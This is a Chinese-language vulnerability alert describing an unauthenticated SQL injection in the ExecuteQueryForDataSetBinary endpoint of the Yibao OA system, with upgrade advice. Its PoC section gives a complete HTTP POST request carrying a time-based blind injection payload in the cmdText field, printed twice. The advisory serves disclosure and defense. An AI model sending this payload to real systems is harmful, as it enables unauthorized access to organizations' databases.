漏洞预警 | 易宝OA系统SQL注入漏洞

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理、协同办公等多种功能。

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：易宝OA系统的ExecuteQueryForDataSetBinary接口存在SQL注入漏洞，未授权的攻击者可以通过该漏洞获取数据库信息。

0x04 影响版本

易宝OA

0x05 POC

POST /api/system/ExecuteQueryForDataSetBinary HTTP/1.1
Host: {host}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 43

token=zxh&cmdText=;WAITFOR DELAY '0:0:2'--+

POST /api/system/ExecuteQueryForDataSetBinary HTTP/1.1Host: {host}Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 43
token=zxh&cmdText=;WAITFOR DELAY '0:0:2'--+

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

http://www.topvision.me/

上一：漏洞预警 | SpringBlade SQL注入漏洞

下一：API漏洞扫描工具

微信扫描关注我们

周一至周五（工作日） 09:00-18:00
周末/法定节假日（值班）09:00-18:00

联系人：徐泮

手机：17620028178

邮件：1536715554@qq.com

地址：广州市天河区思成路19号五号楼2F C29

热门

漏洞预警 | 易宝OA系统SQL注入漏洞

暂无